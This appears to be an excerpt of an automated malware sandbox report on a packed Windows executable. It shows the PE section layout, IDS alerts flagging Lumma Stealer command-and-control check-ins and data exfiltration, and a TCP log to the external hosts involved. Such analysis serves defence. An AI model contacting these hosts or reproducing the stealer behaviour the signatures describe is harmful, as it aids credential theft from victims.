                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_RESOURCE0x00x0
                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_BASERELOC0x531f80x8.idata
                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                                                                                                        NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                                        0x10000x510000x2480008e5e886640d33ca1a7481b545bb719aFalse0.9974582619863014data7.980570361572185IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                        .rsrc 0x520000x10000x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                        .idata 0x530000x10000x20019a29171433eeef17e42fd663f137134False0.14453125data0.9996515881509258IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                        nxyovwhs0x540000x2ad0000x2ace009ca5ee55bc872499e618a443934935efunknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                        mlwhfqbs0x3010000x10000x40092f8d524752b4d559c0573a047c91ae4False0.7919921875data6.150351651041809IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                        .taggant0x3020000x30000x220052da4d5bb4d88d11caf08d7c6deac2e2False0.064453125DOS executable (COM)0.7645155615730779IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                        DLLImport
                                                                                                                                                        kernel32.dlllstrcpy
                                                                                                                                                        TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                                                        2024-12-23T08:19:03.502498+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.749700104.21.32.96443TCP
                                                                                                                                                        2024-12-23T08:19:04.247996+01002049836ET MALWARE Lumma Stealer Related Activity1192.168.2.749700104.21.32.96443TCP
                                                                                                                                                        2024-12-23T08:19:04.247996+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.749700104.21.32.96443TCP
                                                                                                                                                        2024-12-23T08:19:05.590428+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.749701104.21.32.96443TCP
                                                                                                                                                        2024-12-23T08:19:11.524442+01002049812ET MALWARE Lumma Stealer Related Activity M21192.168.2.749701104.21.32.96443TCP
                                                                                                                                                        2024-12-23T08:19:11.524442+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.749701104.21.32.96443TCP
                                                                                                                                                        2024-12-23T08:19:13.114569+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.749713104.21.32.96443TCP
                                                                                                                                                        2024-12-23T08:19:15.782207+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.749719104.21.32.96443TCP
                                                                                                                                                        2024-12-23T08:19:18.282621+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.749725104.21.32.96443TCP
                                                                                                                                                        2024-12-23T08:19:20.990517+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.749735104.21.32.96443TCP
                                                                                                                                                        2024-12-23T08:19:21.966381+01002048094ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration1192.168.2.749735104.21.32.96443TCP
                                                                                                                                                        2024-12-23T08:19:23.714226+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.749747104.21.32.96443TCP
                                                                                                                                                        2024-12-23T08:19:23.841820+01002843864ETPRO MALWARE Suspicious Zipped Filename in Outbound POST Request (screen.) M21192.168.2.749747104.21.32.96443TCP
                                                                                                                                                        2024-12-23T08:19:29.751080+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.749758104.21.32.96443TCP
                                                                                                                                                        2024-12-23T08:19:30.519681+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.749758104.21.32.96443TCP
                                                                                                                                                        2024-12-23T08:19:32.053151+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.749764185.166.143.49443TCP
                                                                                                                                                        2024-12-23T08:19:34.464774+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.74977516.182.101.249443TCP
                                                                                                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                        Dec 23, 2024 08:19:02.222573996 CET49700443192.168.2.7104.21.32.96
                                                                                                                                                        Dec 23, 2024 08:19:02.222615957 CET44349700104.21.32.96192.168.2.7
                                                                                                                                                        Dec 23, 2024 08:19:02.222752094 CET49700443192.168.2.7104.21.32.96
                                                                                                                                                        Dec 23, 2024 08:19:02.232940912 CET49700443192.168.2.7104.21.32.96
                                                                                                                                                        Dec 23, 2024 08:19:02.232959032 CET44349700104.21.32.96192.168.2.7
                                                                                                                                                        Dec 23, 2024 08:19:03.502381086 CET44349700104.21.32.96192.168.2.7
                                                                                                                                                        Dec 23, 2024 08:19:03.502497911 CET49700443192.168.2.7104.21.32.96
                                                                                                                                                        Dec 23, 2024 08:19:03.507144928 CET49700443192.168.2.7104.21.32.96
                                                                                                                                                        Dec 23, 2024 08:19:03.507150888 CET44349700104.21.32.96192.168.2.7
                                                                                                                                                        Dec 23, 2024 08:19:03.507579088 CET44349700104.21.32.96192.168.2.7
                                                                                                                                                        Dec 23, 2024 08:19:03.553814888 CET49700443192.168.2.7104.21.32.96
                                                                                                                                                        Dec 23, 2024 08:19:03.567589045 CET49700443192.168.2.7104.21.32.96
                                                                                                                                                        Dec 23, 2024 08:19:03.567620993 CET49700443192.168.2.7104.21.32.96
                                                                                                                                                        Dec 23, 2024 08:19:03.567890882 CET44349700104.21.32.96192.168.2.7
                                                                                                                                                        Dec 23, 2024 08:19:04.247999907 CET44349700104.21.32.96192.168.2.7
                                                                                                                                                        Dec 23, 2024 08:19:04.248102903 CET44349700104.21.32.96192.168.2.7
                                                                                                                                                        Dec 23, 2024 08:19:04.248198032 CET49700443192.168.2.7104.21.32.96
                                                                                                                                                        Dec 23, 2024 08:19:04.364831924 CET49700443192.168.2.7104.21.32.96
                                                                                                                                                        Dec 23, 2024 08:19:04.364831924 CET49700443192.168.2.7104.21.32.96
                                                                                                                                                        Dec 23, 2024 08:19:04.364862919 CET44349700104.21.32.96192.168.2.7
                                                                                                                                                        Dec 23, 2024 08:19:04.364867926 CET44349700104.21.32.96192.168.2.7
                                                                                                                                                        Dec 23, 2024 08:19:04.376036882 CET49701443192.168.2.7104.21.32.96
                                                                                                                                                        Dec 23, 2024 08:19:04.376082897 CET44349701104.21.32.96192.168.2.7
                                                                                                                                                        Dec 23, 2024 08:19:04.376255035 CET49701443192.168.2.7104.21.32.96
                                                                                                                                                        Dec 23, 2024 08:19:04.376562119 CET49701443192.168.2.7104.21.32.96
                                                                                                                                                        Dec 23, 2024 08:19:04.376573086 CET44349701104.21.32.96192.168.2.7
                                                                                                                                                        Dec 23, 2024 08:19:05.590109110 CET44349701104.21.32.96192.168.2.7
                                                                                                                                                        Dec 23, 2024 08:19:05.590428114 CET49701443192.168.2.7104.21.32.96
                                                                                                                                                        Dec 23, 2024 08:19:05.618906975 CET49701443192.168.2.7104.21.32.96
                                                                                                                                                        Dec 23, 2024 08:19:05.618926048 CET44349701104.21.32.96192.168.2.7
                                                                                                                                                        Dec 23, 2024 08:19:05.619180918 CET44349701104.21.32.96192.168.2.7
                                                                                                                                                        Dec 23, 2024 08:19:05.646373987 CET49701443192.168.2.7104.21.32.96
                                                                                                                                                        Dec 23, 2024 08:19:05.646543026 CET49701443192.168.2.7104.21.32.96
                                                                                                                                                        Dec 23, 2024 08:19:05.646595001 CET44349701104.21.32.96192.168.2.7
                                                                                                                                                        Dec 23, 2024 08:19:11.524429083 CET44349701104.21.32.96192.168.2.7
                                                                                                                                                        Dec 23, 2024 08:19:11.524504900 CET44349701104.21.32.96192.168.2.7
                                                                                                                                                        Dec 23, 2024 08:19:11.524553061 CET44349701104.21.32.96192.168.2.7
                                                                                                                                                        Dec 23, 2024 08:19:11.524563074 CET49701443192.168.2.7104.21.32.96
                                                                                                                                                        Dec 23, 2024 08:19:11.524579048 CET44349701104.21.32.96192.168.2.7
                                                                                                                                                        Dec 23, 2024 08:19:11.524734020 CET49701443192.168.2.7104.21.32.96
                                                                                                                                                        Dec 23, 2024 08:19:11.524740934 CET44349701104.21.32.96192.168.2.7
                                                                                                                                                        Dec 23, 2024 08:19:11.527137995 CET44349701104.21.32.96192.168.2.7
                                                                                                                                                        Dec 23, 2024 08:19:11.527252913 CET49701443192.168.2.7104.21.32.96
                                                                                                                                                        Dec 23, 2024 08:19:11.527271986 CET44349701104.21.32.96192.168.2.7
                                                                                                                                                        Dec 23, 2024 08:19:11.535507917 CET44349701104.21.32.96192.168.2.7
                                                                                                                                                        Dec 23, 2024 08:19:11.535691977 CET49701443192.168.2.7104.21.32.96
                                                                                                                                                        Dec 23, 2024 08:19:11.535710096 CET44349701104.21.32.96192.168.2.7
                                                                                                                                                        Dec 23, 2024 08:19:11.543865919 CET44349701104.21.32.96192.168.2.7
                                                                                                                                                        Dec 23, 2024 08:19:11.543912888 CET49701443192.168.2.7104.21.32.96
                                                                                                                                                        Dec 23, 2024 08:19:11.543922901 CET44349701104.21.32.96192.168.2.7
                                                                                                                                                        Dec 23, 2024 08:19:11.585091114 CET49701443192.168.2.7104.21.32.96
                                                                                                                                                        Dec 23, 2024 08:19:11.716284037 CET44349701104.21.32.96192.168.2.7
                                                                                                                                                        Dec 23, 2024 08:19:11.718513012 CET44349701104.21.32.96192.168.2.7
                                                                                                                                                        Dec 23, 2024 08:19:11.718580008 CET49701443192.168.2.7104.21.32.96
                                                                                                                                                        Dec 23, 2024 08:19:11.718590021 CET44349701104.21.32.96192.168.2.7
                                                                                                                                                        Dec 23, 2024 08:19:11.725927114 CET44349701104.21.32.96192.168.2.7
                                                                                                                                                        Dec 23, 2024 08:19:11.726020098 CET49701443192.168.2.7104.21.32.96
                                                                                                                                                        Dec 23, 2024 08:19:11.726202965 CET49701443192.168.2.7104.21.32.96
                                                                                                                                                        Dec 23, 2024 08:19:11.726203918 CET49701443192.168.2.7104.21.32.96
                                                                                                                                                        Dec 23, 2024 08:19:11.726222038 CET44349701104.21.32.96192.168.2.7
                                                                                                                                                        Dec 23, 2024 08:19:11.726238966 CET44349701104.21.32.96192.168.2.7
                                                                                                                                                        Dec 23, 2024 08:19:11.892868996 CET49713443192.168.2.7104.21.32.96
                                                                                                                                                        Dec 23, 2024 08:19:11.892924070 CET44349713104.21.32.96192.168.2.7
                                                                                                                                                        Dec 23, 2024 08:19:11.893039942 CET49713443192.168.2.7104.21.32.96
                                                                                                                                                        Dec 23, 2024 08:19:11.893500090 CET49713443192.168.2.7104.21.32.96
                                                                                                                                                        Dec 23, 2024 08:19:11.893508911 CET44349713104.21.32.96192.168.2.7
                                                                                                                                                        Dec 23, 2024 08:19:13.114435911 CET44349713104.21.32.96192.168.2.7
                                                                                                                                                        Dec 23, 2024 08:19:13.114568949 CET49713443192.168.2.7104.21.32.96
                                                                                                                                                        Dec 23, 2024 08:19:13.115869999 CET49713443192.168.2.7104.21.32.96
                                                                                                                                                        Dec 23, 2024 08:19:13.115876913 CET44349713104.21.32.96192.168.2.7
                                                                                                                                                        Dec 23, 2024 08:19:13.116799116 CET44349713104.21.32.96192.168.2.7
                                                                                                                                                        Dec 23, 2024 08:19:13.125323057 CET49713443192.168.2.7104.21.32.96
                                                                                                                                                        Dec 23, 2024 08:19:13.125461102 CET49713443192.168.2.7104.21.32.96
                                                                                                                                                        Dec 23, 2024 08:19:13.125494003 CET44349713104.21.32.96192.168.2.7
                                                                                                                                                        Dec 23, 2024 08:19:14.116319895 CET44349713104.21.32.96192.168.2.7
                                                                                                                                                        Dec 23, 2024 08:19:14.116600990 CET44349713104.21.32.96192.168.2.7
                                                                                                                                                        Dec 23, 2024 08:19:14.116664886 CET49713443192.168.2.7104.21.32.96
                                                                                                                                                        Dec 23, 2024 08:19:14.274437904 CET49713443192.168.2.7104.21.32.96
                                                                                                                                                        Dec 23, 2024 08:19:14.274478912 CET44349713104.21.32.96192.168.2.7
                                                                                                                                                        Dec 23, 2024 08:19:14.562024117 CET49719443192.168.2.7104.21.32.96
                                                                                                                                                        Dec 23, 2024 08:19:14.562079906 CET44349719104.21.32.96192.168.2.7
                                                                                                                                                        Dec 23, 2024 08:19:14.562182903 CET49719443192.168.2.7104.21.32.96
                                                                                                                                                        Dec 23, 2024 08:19:14.562612057 CET49719443192.168.2.7104.21.32.96
                                                                                                                                                        Dec 23, 2024 08:19:14.562627077 CET44349719104.21.32.96192.168.2.7
                                                                                                                                                        Dec 23, 2024 08:19:15.782105923 CET44349719104.21.32.96192.168.2.7
                                                                                                                                                        Dec 23, 2024 08:19:15.782207012 CET49719443192.168.2.7104.21.32.96
                                                                                                                                                        Dec 23, 2024 08:19:15.783941031 CET49719443192.168.2.7104.21.32.96
                                                                                                                                                        Dec 23, 2024 08:19:15.783946991 CET44349719104.21.32.96192.168.2.7
                                                                                                                                                        Dec 23, 2024 08:19:15.784246922 CET44349719104.21.32.96192.168.2.7
                                                                                                                                                        Dec 23, 2024 08:19:15.785517931 CET49719443192.168.2.7104.21.32.96
                                                                                                                                                        Dec 23, 2024 08:19:15.785670042 CET49719443192.168.2.7104.21.32.96
                                                                                                                                                        Dec 23, 2024 08:19:15.785705090 CET44349719104.21.32.96192.168.2.7
                                                                                                                                                        Dec 23, 2024 08:19:15.785773993 CET49719443192.168.2.7104.21.32.96
                                                                                                                                                        Dec 23, 2024 08:19:15.827322960 CET44349719104.21.32.96192.168.2.7
                                                                                                                                                        Dec 23, 2024 08:19:16.754496098 CET44349719104.21.32.96192.168.2.7
                                                                                                                                                        Dec 23, 2024 08:19:16.754606009 CET44349719104.21.32.96192.168.2.7
                                                                                                                                                        Dec 23, 2024 08:19:16.754776955 CET49719443192.168.2.7104.21.32.96
                                                                                                                                                        Dec 23, 2024 08:19:16.755040884 CET49719443192.168.2.7104.21.32.96
                                                                                                                                                        Dec 23, 2024 08:19:16.755059004 CET44349719104.21.32.96192.168.2.7
                                                                                                                                                        Dec 23, 2024 08:19:17.070183039 CET49725443192.168.2.7104.21.32.96
                                                                                                                                                        Dec 23, 2024 08:19:17.070223093 CET44349725104.21.32.96192.168.2.7
                                                                                                                                                        Dec 23, 2024 08:19:17.070362091 CET49725443192.168.2.7104.21.32.96
                                                                                                                                                        Dec 23, 2024 08:19:17.070720911 CET49725443192.168.2.7104.21.32.96
                                                                                                                                                        Dec 23, 2024 08:19:17.070738077 CET44349725104.21.32.96192.168.2.7
                                                                                                                                                        Dec 23, 2024 08:19:18.282507896 CET44349725104.21.32.96192.168.2.7
                                                                                                                                                        Dec 23, 2024 08:19:18.282620907 CET49725443192.168.2.7104.21.32.96
                                                                                                                                                        Dec 23, 2024 08:19:18.286905050 CET49725443192.168.2.7104.21.32.96
                                                                                                                                                        Dec 23, 2024 08:19:18.286911964 CET44349725104.21.32.96192.168.2.7
                                                                                                                                                        Dec 23, 2024 08:19:18.287178040 CET44349725104.21.32.96192.168.2.7
                                                                                                                                                        Dec 23, 2024 08:19:18.288660049 CET49725443192.168.2.7104.21.32.96
                                                                                                                                                        Dec 23, 2024 08:19:18.288755894 CET49725443192.168.2.7104.21.32.96
                                                                                                                                                        Dec 23, 2024 08:19:18.288789034 CET44349725104.21.32.96192.168.2.7
                                                                                                                                                        Dec 23, 2024 08:19:18.288862944 CET49725443192.168.2.7104.21.32.96
                                                                                                                                                        Dec 23, 2024 08:19:18.288872004 CET44349725104.21.32.96192.168.2.7
                                                                                                                                                        Dec 23, 2024 08:19:19.253293037 CET44349725104.21.32.96192.168.2.7
                                                                                                                                                        Dec 23, 2024 08:19:19.253390074 CET44349725104.21.32.96192.168.2.7
                                                                                                                                                        Dec 23, 2024 08:19:19.253489017 CET49725443192.168.2.7104.21.32.96
                                                                                                                                                        Dec 23, 2024 08:19:19.253695965 CET49725443192.168.2.7104.21.32.96
                                                                                                                                                        Dec 23, 2024 08:19:19.253715992 CET44349725104.21.32.96192.168.2.7
                                                                                                                                                        Dec 23, 2024 08:19:19.777648926 CET49735443192.168.2.7104.21.32.96
                                                                                                                                                        Dec 23, 2024 08:19:19.777704000 CET44349735104.21.32.96192.168.2.7
                                                                                                                                                        Dec 23, 2024 08:19:19.778084993 CET49735443192.168.2.7104.21.32.96
                                                                                                                                                        Dec 23, 2024 08:19:19.778350115 CET49735443192.168.2.7104.21.32.96
                                                                                                                                                        Dec 23, 2024 08:19:19.778367996 CET44349735104.21.32.96192.168.2.7
                                                                                                                                                        Dec 23, 2024 08:19:20.990215063 CET44349735104.21.32.96192.168.2.7
                                                                                                                                                        Dec 23, 2024 08:19:20.990516901 CET49735443192.168.2.7104.21.32.96
                                                                                                                                                        Dec 23, 2024 08:19:21.201600075 CET49735443192.168.2.7104.21.32.96
                                                                                                                                                        Dec 23, 2024 08:19:21.201621056 CET44349735104.21.32.96192.168.2.7
                                                                                                                                                        Dec 23, 2024 08:19:21.201988935 CET44349735104.21.32.96192.168.2.7
                                                                                                                                                        Dec 23, 2024 08:19:21.211268902 CET49735443192.168.2.7104.21.32.96
                                                                                                                                                        Dec 23, 2024 08:19:21.211605072 CET49735443192.168.2.7104.21.32.96
                                                                                                                                                        Dec 23, 2024 08:19:21.211611032 CET44349735104.21.32.96192.168.2.7
                                                                                                                                                        Dec 23, 2024 08:19:21.966392040 CET44349735104.21.32.96192.168.2.7
                                                                                                                                                        Dec 23, 2024 08:19:21.966500998 CET44349735104.21.32.96192.168.2.7
                                                                                                                                                        Dec 23, 2024 08:19:21.966558933 CET49735443192.168.2.7104.21.32.96
                                                                                                                                                        Dec 23, 2024 08:19:21.966697931 CET49735443192.168.2.7104.21.32.96
                                                                                                                                                        Dec 23, 2024 08:19:21.966717958 CET44349735104.21.32.96192.168.2.7
                                                                                                                                                        Dec 23, 2024 08:19:22.501697063 CET49747443192.168.2.7104.21.32.96
                                                                                                                                                        Dec 23, 2024 08:19:22.501730919 CET44349747104.21.32.96192.168.2.7
                                                                                                                                                        Dec 23, 2024 08:19:22.501828909 CET49747443192.168.2.7104.21.32.96
                                                                                                                                                        Dec 23, 2024 08:19:22.502218962 CET49747443192.168.2.7104.21.32.96
                                                                                                                                                        Dec 23, 2024 08:19:22.502229929 CET44349747104.21.32.96192.168.2.7
                                                                                                                                                        Dec 23, 2024 08:19:23.712321997 CET44349747104.21.32.96192.168.2.7
                                                                                                                                                        Dec 23, 2024 08:19:23.714226007 CET49747443192.168.2.7104.21.32.96
                                                                                                                                                        Dec 23, 2024 08:19:23.718338013 CET49747443192.168.2.7104.21.32.96
                                                                                                                                                        Dec 23, 2024 08:19:23.718343019 CET44349747104.21.32.96192.168.2.7
                                                                                                                                                        Dec 23, 2024 08:19:23.718590021 CET44349747104.21.32.96192.168.2.7
                                                                                                                                                        Dec 23, 2024 08:19:23.772703886 CET49747443192.168.2.7104.21.32.96
                                                                                                                                                        Dec 23, 2024 08:19:23.840552092 CET49747443192.168.2.7104.21.32.96
                                                                                                                                                        Dec 23, 2024 08:19:23.841398954 CET49747443192.168.2.7104.21.32.96
                                                                                                                                                        Dec 23, 2024 08:19:23.841442108 CET44349747104.21.32.96192.168.2.7
                                                                                                                                                        Dec 23, 2024 08:19:23.841545105 CET49747443192.168.2.7104.21.32.96
                                                                                                                                                        Dec 23, 2024 08:19:23.841579914 CET44349747104.21.32.96192.168.2.7
                                                                                                                                                        Dec 23, 2024 08:19:23.841708899 CET49747443192.168.2.7104.21.32.96
                                                                                                                                                        Dec 23, 2024 08:19:23.841738939 CET44349747104.21.32.96192.168.2.7
                                                                                                                                                        Dec 23, 2024 08:19:23.841850042 CET49747443192.168.2.7104.21.32.96
                                                                                                                                                        Dec 23, 2024 08:19:23.841881990 CET44349747104.21.32.96192.168.2.7
                                                                                                                                                        Dec 23, 2024 08:19:23.842008114 CET49747443192.168.2.7104.21.32.96
                                                                                                                                                        Dec 23, 2024 08:19:23.842041969 CET44349747104.21.32.96192.168.2.7
                                                                                                                                                        Dec 23, 2024 08:19:23.842202902 CET49747443192.168.2.7104.21.32.96
                                                                                                                                                        Dec 23, 2024 08:19:23.842231989 CET44349747104.21.32.96192.168.2.7
                                                                                                                                                        Dec 23, 2024 08:19:23.842236042 CET49747443192.168.2.7104.21.32.96
                                                                                                                                                        Dec 23, 2024 08:19:23.842251062 CET44349747104.21.32.96192.168.2.7
                                                                                                                                                        Dec 23, 2024 08:19:23.842345953 CET49747443192.168.2.7104.21.32.96
                                                                                                                                                        Dec 23, 2024 08:19:23.842374086 CET44349747104.21.32.96192.168.2.7
                                                                                                                                                        Dec 23, 2024 08:19:23.842415094 CET49747443192.168.2.7104.21.32.96
                                                                                                                                                        Dec 23, 2024 08:19:23.842530966 CET49747443192.168.2.7104.21.32.96
                                                                                                                                                        Dec 23, 2024 08:19:23.842556000 CET49747443192.168.2.7104.21.32.96
                                                                                                                                                        Dec 23, 2024 08:19:23.883322001 CET44349747104.21.32.96192.168.2.7
                                                                                                                                                        Dec 23, 2024 08:19:23.883498907 CET49747443192.168.2.7104.21.32.96
                                                                                                                                                        Dec 23, 2024 08:19:23.883522034 CET44349747104.21.32.96192.168.2.7
                                                                                                                                                        Dec 23, 2024 08:19:23.883543968 CET49747443192.168.2.7104.21.32.96
                                                                                                                                                        Dec 23, 2024 08:19:23.883565903 CET44349747104.21.32.96192.168.2.7
                                                                                                                                                        Dec 23, 2024 08:19:23.883584976 CET49747443192.168.2.7104.21.32.96
                                                                                                                                                        Dec 23, 2024 08:19:23.883599997 CET44349747104.21.32.96192.168.2.7
                                                                                                                                                        Dec 23, 2024 08:19:28.529529095 CET44349747104.21.32.96192.168.2.7
                                                                                                                                                        Dec 23, 2024 08:19:28.529608965 CET44349747104.21.32.96192.168.2.7
                                                                                                                                                        Dec 23, 2024 08:19:28.529710054 CET49747443192.168.2.7104.21.32.96
                                                                                                                                                        Dec 23, 2024 08:19:28.529937029 CET49747443192.168.2.7104.21.32.96
                                                                                                                                                        Dec 23, 2024 08:19:28.529946089 CET44349747104.21.32.96192.168.2.7
                                                                                                                                                        Dec 23, 2024 08:19:28.538683891 CET49758443192.168.2.7104.21.32.96
                                                                                                                                                        Dec 23, 2024 08:19:28.538713932 CET44349758104.21.32.96192.168.2.7
                                                                                                                                                        Dec 23, 2024 08:19:28.538901091 CET49758443192.168.2.7104.21.32.96
                                                                                                                                                        Dec 23, 2024 08:19:28.539124012 CET49758443192.168.2.7104.21.32.96
                                                                                                                                                        Dec 23, 2024 08:19:28.539136887 CET44349758104.21.32.96192.168.2.7
                                                                                                                                                        Dec 23, 2024 08:19:29.750931978 CET44349758104.21.32.96192.168.2.7
                                                                                                                                                        Dec 23, 2024 08:19:29.751080036 CET49758443192.168.2.7104.21.32.96
                                                                                                                                                        Dec 23, 2024 08:19:29.752408981 CET49758443192.168.2.7104.21.32.96
                                                                                                                                                        Dec 23, 2024 08:19:29.752414942 CET44349758104.21.32.96192.168.2.7
                                                                                                                                                        Dec 23, 2024 08:19:29.752652884 CET44349758104.21.32.96192.168.2.7
                                                                                                                                                        Dec 23, 2024 08:19:29.758899927 CET49758443192.168.2.7104.21.32.96
                                                                                                                                                        Dec 23, 2024 08:19:29.763294935 CET49758443192.168.2.7104.21.32.96
                                                                                                                                                        Dec 23, 2024 08:19:29.763329029 CET44349758104.21.32.96192.168.2.7
                                                                                                                                                        Dec 23, 2024 08:19:30.519680023 CET44349758104.21.32.96192.168.2.7
                                                                                                                                                        Dec 23, 2024 08:19:30.519778967 CET44349758104.21.32.96192.168.2.7
                                                                                                                                                        Dec 23, 2024 08:19:30.519860983 CET49758443192.168.2.7104.21.32.96
                                                                                                                                                        Dec 23, 2024 08:19:30.520071030 CET49758443192.168.2.7104.21.32.96
                                                                                                                                                        Dec 23, 2024 08:19:30.520071030 CET49758443192.168.2.7104.21.32.96
                                                                                                                                                        Dec 23, 2024 08:19:30.520087957 CET44349758104.21.32.96192.168.2.7
                                                                                                                                                        Dec 23, 2024 08:19:30.520097017 CET44349758104.21.32.96192.168.2.7
                                                                                                                                                        Dec 23, 2024 08:19:30.661485910 CET49764443192.168.2.7185.166.143.49
                                                                                                                                                        Dec 23, 2024 08:19:30.661531925 CET44349764185.166.143.49192.168.2.7
                                                                                                                                                        Dec 23, 2024 08:19:30.661679029 CET49764443192.168.2.7185.166.143.49
                                                                                                                                                        Dec 23, 2024 08:19:30.662061930 CET49764443192.168.2.7185.166.143.49
                                                                                                                                                        Dec 23, 2024 08:19:30.662075996 CET44349764185.166.143.49192.168.2.7
                                                                                                                                                        Dec 23, 2024 08:19:32.053014040 CET44349764185.166.143.49192.168.2.7
                                                                                                                                                        Dec 23, 2024 08:19:32.053150892 CET49764443192.168.2.7185.166.143.49
                                                                                                                                                        Dec 23, 2024 08:19:32.060362101 CET49764443192.168.2.7185.166.143.49
                                                                                                                                                        Dec 23, 2024 08:19:32.060379982 CET44349764185.166.143.49192.168.2.7
                                                                                                                                                        Dec 23, 2024 08:19:32.060627937 CET44349764185.166.143.49192.168.2.7
                                                                                                                                                        Dec 23, 2024 08:19:32.062254906 CET49764443192.168.2.7185.166.143.49
                                                                                                                                                        Dec 23, 2024 08:19:32.103377104 CET44349764185.166.143.49192.168.2.7
                                                                                                                                                        Dec 23, 2024 08:19:32.749420881 CET44349764185.166.143.49192.168.2.7
                                                                                                                                                        Dec 23, 2024 08:19:32.749438047 CET44349764185.166.143.49192.168.2.7
                                                                                                                                                        Dec 23, 2024 08:19:32.749507904 CET44349764185.166.143.49192.168.2.7
                                                                                                                                                        Dec 23, 2024 08:19:32.749598980 CET49764443192.168.2.7185.166.143.49
                                                                                                                                                        Dec 23, 2024 08:19:32.749628067 CET49764443192.168.2.7185.166.143.49
                                                                                                                                                        Dec 23, 2024 08:19:32.749869108 CET49764443192.168.2.7185.166.143.49
                                                                                                                                                        Dec 23, 2024 08:19:32.749888897 CET44349764185.166.143.49192.168.2.7
                                                                                                                                                        Dec 23, 2024 08:19:32.749918938 CET49764443192.168.2.7185.166.143.49
                                                                                                                                                        Dec 23, 2024 08:19:32.749924898 CET44349764185.166.143.49192.168.2.7
                                                                                                                                                        Dec 23, 2024 08:19:33.047893047 CET49775443192.168.2.716.182.101.249
                                                                                                                                                        Dec 23, 2024 08:19:33.047949076 CET4434977516.182.101.249192.168.2.7
                                                                                                                                                        Dec 23, 2024 08:19:33.048048973 CET49775443192.168.2.716.182.101.249
                                                                                                                                                        Dec 23, 2024 08:19:33.048453093 CET49775443192.168.2.716.182.101.249
                                                                                                                                                        Dec 23, 2024 08:19:33.048472881 CET4434977516.182.101.249192.168.2.7
                                                                                                                                                        Dec 23, 2024 08:19:34.464641094 CET4434977516.182.101.249192.168.2.7
                                                                                                                                                        Dec 23, 2024 08:19:34.464773893 CET49775443192.168.2.716.182.101.249
                                                                                                                                                        Dec 23, 2024 08:19:34.482343912 CET49775443192.168.2.716.182.101.249
                                                                                                                                                        Dec 23, 2024 08:19:34.482367992 CET4434977516.182.101.249192.168.2.7
                                                                                                                                                        Dec 23, 2024 08:19:34.482582092 CET4434977516.182.101.249192.168.2.7
                                                                                                                                                        Dec 23, 2024 08:19:34.483766079 CET49775443192.168.2.716.182.101.249
                                                                                                                                                        Dec 23, 2024 08:19:34.531322002 CET4434977516.182.101.249192.168.2.7
                                                                                                                                                        Dec 23, 2024 08:19:34.931189060 CET4434977516.182.101.249192.168.2.7
                                                                                                                                                        Dec 23, 2024 08:19:34.973885059 CET4434977516.182.101.249192.168.2.7
                                                                                                                                                        Dec 23, 2024 08:19:34.973906994 CET4434977516.182.101.249192.168.2.7
                                                                                                                                                        Dec 23, 2024 08:19:34.974029064 CET49775443192.168.2.716.182.101.249
                                                                                                                                                        Dec 23, 2024 08:19:34.974070072 CET4434977516.182.101.249192.168.2.7
                                                                                                                                                        Dec 23, 2024 08:19:34.974124908 CET49775443192.168.2.716.182.101.249
                                                                                                                                                        Dec 23, 2024 08:19:34.982076883 CET4434977516.182.101.249192.168.2.7
                                                                                                                                                        Dec 23, 2024 08:19:34.982141018 CET49775443192.168.2.716.182.101.249
